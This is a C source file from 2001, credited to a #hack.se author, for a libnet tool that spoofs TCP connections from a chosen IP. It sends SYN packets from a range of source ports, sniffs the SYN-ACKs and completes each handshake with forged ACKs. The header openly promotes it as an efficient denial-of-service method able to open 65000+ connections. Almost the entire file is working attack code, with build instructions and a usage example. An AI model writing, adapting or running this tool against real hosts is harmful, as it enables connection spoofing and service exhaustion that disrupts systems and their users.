/*
 * This is unpublished proprietary source code of #hack.se.   
 *                                                            
 * You are not allowed to use or redistribute this material   
 * in source or binary form without the prior written consent 
 * of the author.                                             
 *                                                            
 */

/*
 * fake.c written by Happy-H <happy-h@sekure.net> 
 * date: Fri Aug 31 03:58:23 CEST 2001
 * 
 * A program that spoofs connections from a IP in your LAN.
 * (Or from your own if you want).
 * Excellent way of DoS since you can open up 65000+ connections
 * (from one IP) with almost no system activity from your side.
 *
 * gcc `libnet-config --defines --cflags` fakeConnect.c -o fakeConnect
 * `libnet-config --libs` -lpthread
 *
 * should do the trick. 
 *
 * This program require:
 *
 * libnet - http://www.packetfactory.net/Projects/Libnet/
 * POSIX threads
 * 
 *
 */

#include <libnet.h> 
#include <pthread.h>

#define ERROR -1
#define SUCCESS 1
#define LIBNET_LIL_ENDIAN 1
#define TRUE 1
#define BUFLEN 1024

void usage(char *); 
void sendSyn(u_long, u_long, u_short, u_short, u_short);
void *answerSynAck(void *);
void checkPacket();

pthread_t ansThread;
int delay=0;

int main(int argc,char *argv[])
{

  u_long srcIp,dstIp;
  u_short srcPrt,dstPrt,startPrt,stopPrt;
  char *cp;
  int c;

  srcIp=0;
  srcPrt=0;
  dstIp=0;
  dstPrt=0;
  startPrt=0;
  stopPrt=0;

  
  /* Check the arguments */
  while((c = getopt(argc, argv, "d:s:r:w:")) != EOF) { 
    switch (c) 
      {
      	/* 
	 *  We expect the input to be of the form `ip.ip.ip.ip.port`.  We 
	 *  point cp to the last dot of the IP address/port string and 
	 *  then seperate them with a NULL byte.  The optarg now points to 
	 *  just the IP address, and cp points to the port. 
	 */ 
      case 'd': 
	if (!(cp = strrchr(optarg, '.'))) { 
	  usage(argv[0]); 
	} 
	*cp++ = 0; 
	dstPrt = (u_short)atoi(cp); 
	if (!(dstIp = libnet_name_resolve(optarg, LIBNET_RESOLVE))) { 
	  libnet_error(LIBNET_ERR_FATAL, "Bad destination IP address: %s\n",
		       optarg); 
	} 
	break; 
      case 's': 
	if (!(srcIp = libnet_name_resolve(optarg, LIBNET_RESOLVE))) { 
	  libnet_error(LIBNET_ERR_FATAL, "Bad source IP address: %s\n",
		       optarg); 
	} 
	break;
      case 'r':
	if (!(cp = strrchr(optarg, '-'))) { 
	  usage(argv[0]); 
	} 
	*cp++ = 0; 
	stopPrt = (u_short)atoi(cp); 
	startPrt = (u_short)atoi(optarg);
	break;
      case 'w':
	delay=atoi(optarg);
	delay*=1000;
	break;
      }
  } 

  /* Check that we have all arguments that we need */
  if (!srcIp || !dstIp || !dstPrt || !startPrt || !stopPrt) { 
    usage(argv[0]); 
  }

  /* Create a new thread for the listening part of the program
     which just go to answerSynAck function and will stay there
     for the rest of the program */
  if(pthread_create(&ansThread, NULL, &answerSynAck, NULL)){
    printf("Couldn't create answering thread, giving up...\n");
    return(ERROR);
  }
  /* Wait a sec for the other thread so we don't miss any SYN ACK packets*/
  sleep(1);
  /* Let's start to send away SYN packets */
  sendSyn(srcIp,dstIp,dstPrt,startPrt,stopPrt);

  /* Don't quit yet, wait for the other thread. I.E. wait for ^C */ 
  pthread_join(ansThread,NULL);

  return(SUCCESS);
}

void *answerSynAck(void *arg)
{
  struct libnet_link_int *network;
  int sendSock, c;
  u_char *packet;
  char errBuf[LIBNET_ERRBUF_SIZE];
  int n,fromlen,packetSize;
  char buff[BUFLEN];
  struct sockaddr_in from;
  int srcPrt, dstPrt;
  struct iphdr *ip;
  struct tcphdr *tcp;
  u_char *device;
  struct sockaddr_in sin;
  
  if (libnet_select_device(&sin, &device, errBuf) == -1) {
    libnet_error(LIBNET_ERR_FATAL, "libnet_select_device failed: %s\n",
		 errBuf);
  }

  /* Open up link interface, we need that if we want to see the packets even
     if we have ipchains installed */
  if ((network = libnet_open_link_interface(device, errBuf)) == NULL) {
    libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface: %s\n",
		 errBuf);
  }

  packetSize = LIBNET_IP_H + LIBNET_TCP_H;
  
  /* Init memory for our packet */
  libnet_init_packet(packetSize, &packet);
  if (packet == NULL) {
    libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
  }
  /* Open up a raw socket for the sending part,
     so we don't need to make our own ethernet packet */
  
  sendSock = libnet_open_raw_sock(IPPROTO_RAW);
  if (sendSock == -1) {
    libnet_error(LIBNET_ERR_FATAL, "Can't open network.\n");
  }

  /* Set the structurs at the right offset,
     14 byte is the ethernet header size and the ip is 20 byte */
  ip = (struct iphdr *)(buff+14);
  tcp = (struct tcphdr *)(buff+20+14);

  fromlen=sizeof(struct sockaddr_in);

  /* Let's check for SYN ACK packets with ACK nr 0xABCE since that
     is what they get when we have SEQ nr 0xABCD on our SYN packets */
  while(TRUE) {
    n=recvfrom(network->fd,buff,BUFLEN,0,(struct sockaddr *)&from,&fromlen);

    srcPrt=ntohs(tcp->th_sport);
    dstPrt=ntohs(tcp->th_dport);

    if(tcp->th_flags==(TH_ACK|TH_SYN) && tcp->th_ack==(htonl(0xabce)) ) {
      libnet_build_ip(LIBNET_TCP_H,   /* size of the packet sans IP header */
		      IPTOS_LOWDELAY, /* IP tos */
		      242,            /* IP ID */
		      0,              /* frag stuff */
		      255,            /* TTL */
		      IPPROTO_TCP,    /* transport protocol */
		      ip->daddr,      /* source IP */
		      ip->saddr,      /* destination IP */
		      NULL,           /* payload (none) */
		      0,              /* payload length */
		      packet);        /* packet header memory */
      
      libnet_build_tcp(dstPrt,           /* source TCP port */
		       srcPrt,                 /* destination TCP port */
		       ntohl(tcp->th_ack),     /* sequence number */
		       ntohl(tcp->th_seq)+1,   /* acknowledgement number */
		       TH_ACK,                 /* control flags */
		       1024,                   /* window size */
		       0,                      /* urgent pointer */
		       NULL,                   /* payload (none) */
		       0,                      /* payload length */
		       packet + LIBNET_IP_H);  /* packet header memory */
      
      if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1) {
	libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
      }
      c = libnet_write_ip(sendSock, packet, packetSize);
      if (c < packetSize) {
	libnet_error(LN_ERR_WARNING, "libnet_write_ip only wrote %d bytes\n",
		     c);
      }
    } /* End if */
  } /* End while loop */
  /* No need for cleaning up rutins since we will never be here */
  printf("Fatal Error!");
  exit(ERROR);
}


void sendSyn(u_long srcIp, u_long dstIp, u_short dstPrt,
	     u_short startPrt ,u_short stopPrt)
{
 int c,network,packetSize,i;
 u_char *packet;

 packetSize = LIBNET_IP_H + LIBNET_TCP_H;

 /* Init packet memory */
 libnet_init_packet(packetSize, &packet);
  if (packet == NULL) {
    libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
  }
  
  /* Open up a raw socket for sendign the SYN packets */
  network = libnet_open_raw_sock(IPPROTO_RAW);
  if (network == -1) {
    libnet_error(LIBNET_ERR_FATAL, "Can't open network.\n");
  }

  printf("Delay:\t\t%d ms.\n",delay/1000);
  printf("Every \".\" is 25 SYN packets\n");
  /* Let's go! */
  for(i=0; i<(stopPrt-startPrt); i++) {

    if(!(i%25)) {  /* Print a dot for every 25'th packet we send */
      printf(".");
      fflush(0);
    }

    usleep(delay); /* Wait a bit so we don't flood the network to much */

    libnet_build_ip(LIBNET_TCP_H,   /* size of the packet sans IP header */
		    IPTOS_LOWDELAY, /* IP tos */
		    242,            /* IP ID */
		    0,              /* frag stuff */
		    255,            /* TTL */
		    IPPROTO_TCP,    /* transport protocol */
		    srcIp,          /* source IP */
		    dstIp,          /* destination IP */
		    NULL,           /* payload (none) */
		    0,              /* payload length */
		    packet);        /* packet header memory */

    /* Let's take 0xABCD as SEQ nr since we will then get SYN ACK
       with ACK nr 0xABCE */
    libnet_build_tcp((startPrt+i),           /* source TCP port */
		     dstPrt,                 /* destination TCP port */
		     0xabcd,                 /* sequence number */
		     0x0,                    /* acknowledgement number */
		     TH_SYN,                 /* control flags */
		     1024,                   /* window size */
		     0,                      /* urgent pointer */
		     NULL,                   /* payload (none) */
		     0,                      /* payload length */
		     packet + LIBNET_IP_H);  /* packet header memory */
    
    if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1) {
      libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
    }
    
    c = libnet_write_ip(network, packet, packetSize);
    if (c < packetSize) {
      libnet_error(LN_ERR_WARNING, "libnet_write_ip only wrote %d bytes\n",
		   c);
    }
    
    
  } /* End for loop */
    
  /* Cleaning up rutins */
  if (libnet_close_raw_sock(network) == -1) {
    libnet_error(LN_ERR_WARNING,
		 "libnet_close_raw_sock couldn't close the interface");
  }

  libnet_destroy_packet(&packet);
}

void usage(char *argv)
{
  printf("Usage: %s -s source.ip.nr -d dest.ip.nr.portnr -r startnr-stopnr \
 [-w ms.delay]\n",argv);
  printf("Example: %s -s 130.239.121.114 -d 130.239.121.115.23 -r 1000-2000 -w 10000\n",argv);
  exit(ERROR);
}

